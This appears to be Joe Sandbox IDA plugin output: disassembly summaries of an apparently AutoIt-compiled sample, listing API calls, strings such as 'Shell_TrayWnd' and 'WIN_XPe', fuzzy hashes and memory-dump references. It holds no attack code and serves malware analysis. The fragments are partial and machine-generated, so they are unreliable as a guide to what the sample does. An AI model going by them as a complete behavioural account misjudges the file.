                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: ClassName_wcscmp
                                                • String ID: #32770
                                                • API String ID: 2292705959-463685578
                                                • Opcode ID: 57d71b11be5858cef0455da9043e8e23c89da0cdb92eec006d4d4184a15c1c3c
                                                • Instruction ID: f7b3b4ed75f6ae1dba500aece99c30ed99234b2edcee026b91ffc0199eba3b74
                                                • Opcode Fuzzy Hash: 57d71b11be5858cef0455da9043e8e23c89da0cdb92eec006d4d4184a15c1c3c
                                                • Instruction Fuzzy Hash: B1E06832A003292BD3309A9AAC49FA7F7ACEB82B30F00005BFC44D3040E660AB0587E1
                                                APIs
                                                  • Part of subcall function 00FBB314: _memset.LIBCMT ref: 00FBB321
                                                  • Part of subcall function 00FA0940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00FBB2F0,?,?,?,00F8100A), ref: 00FA0945
                                                • IsDebuggerPresent.KERNEL32(?,?,?,00F8100A), ref: 00FBB2F4
                                                • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00F8100A), ref: 00FBB303
                                                Strings
                                                • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00FBB2FE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                • API String ID: 3158253471-631824599
                                                • Opcode ID: 2a8da6adbd55f44298814bc1c50409e23fcb604b1c766c6dd6e732e4ad62ad66
                                                • Instruction ID: 3f09cb73a911b891d4bbaed983fb8e619698a206bbd94d5f4f989b89c6b85018
                                                • Opcode Fuzzy Hash: 2a8da6adbd55f44298814bc1c50409e23fcb604b1c766c6dd6e732e4ad62ad66
                                                • Instruction Fuzzy Hash: 1DE06DB02003118FDB719F69E5043827BE8AF04314F048A2DE496C7241EBB9E404EFA1
                                                APIs
                                                • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00FD7C82
                                                  • Part of subcall function 00FA3358: _doexit.LIBCMT ref: 00FA3362
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Message_doexit
                                                • String ID: AutoIt$Error allocating memory.
                                                • API String ID: 1993061046-4017498283
                                                • Opcode ID: 82b773d21971f05586dcf191c041841e9189b9efeb6418a34ca16d2d93a11a9a
                                                • Instruction ID: 5eede6f189bcc2428b3be41ea5ad0c2e522bb1a544874526f5e02c53e02d952f
                                                • Opcode Fuzzy Hash: 82b773d21971f05586dcf191c041841e9189b9efeb6418a34ca16d2d93a11a9a
                                                • Instruction Fuzzy Hash: D5D05B7238431837D52532B57C07FCA754C4F05B52F040416FB449D5D34DDA558072E5
                                                APIs
                                                • GetSystemDirectoryW.KERNEL32(?), ref: 00FC1775
                                                  • Part of subcall function 00FFBFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,00FC195E,?), ref: 00FFBFFE
                                                  • Part of subcall function 00FFBFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00FFC010
                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00FC196D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                • String ID: WIN_XPe
                                                • API String ID: 582185067-3257408948
                                                • Opcode ID: d5bd35ba5703b134903fe18aca29de31bdb3e6c0ab61fb3950ce4a60c39f189e
                                                • Instruction ID: c3c2e73bd47aa0bd3d4f38f7e9e0f908a708a974971ec7da4176382a538983bf
                                                • Opcode Fuzzy Hash: d5bd35ba5703b134903fe18aca29de31bdb3e6c0ab61fb3950ce4a60c39f189e
                                                • Instruction Fuzzy Hash: C9F0C07180410ADFDB26DB91CA95FECBBF8BF09311F540099E141A2095D7754F58EF60
                                                APIs
                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0100596E
                                                • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 01005981
                                                  • Part of subcall function 00FE5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00FE52BC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: FindMessagePostSleepWindow
                                                • String ID: Shell_TrayWnd
                                                • API String ID: 529655941-2988720461
                                                • Opcode ID: ea2e1a4f0c835438862cc1b0ec1ca5eb18072b0dc80686f4e818919e10bf72ab
                                                • Instruction ID: 2f5917bd24d61d8638a10dfec6f0297a42af4bed9565c437ce7c03c8d4156185
                                                • Opcode Fuzzy Hash: ea2e1a4f0c835438862cc1b0ec1ca5eb18072b0dc80686f4e818919e10bf72ab
                                                • Instruction Fuzzy Hash: 1BD0C931784312B7E678AB719C0FF967A19AB44B51F000829B389AA1C4C9E99900D754
                                                APIs
                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 010059AE
                                                • PostMessageW.USER32(00000000), ref: 010059B5
                                                  • Part of subcall function 00FE5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00FE52BC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: FindMessagePostSleepWindow
                                                • String ID: Shell_TrayWnd
                                                • API String ID: 529655941-2988720461
                                                • Opcode ID: 2326b7c4144040448a084f5502fd1c814b7dd48d66b8dd78d3a7f154b9c71aa9
                                                • Instruction ID: 57e9153add6cc9322bda2b73723597934c23c2ba5af4b5bbc0d5864933da958c
                                                • Opcode Fuzzy Hash: 2326b7c4144040448a084f5502fd1c814b7dd48d66b8dd78d3a7f154b9c71aa9
                                                • Instruction Fuzzy Hash: FBD0C9317843127BE679AB719C0FF967619AB44B51F000829B385AA1C4C9E9A900D754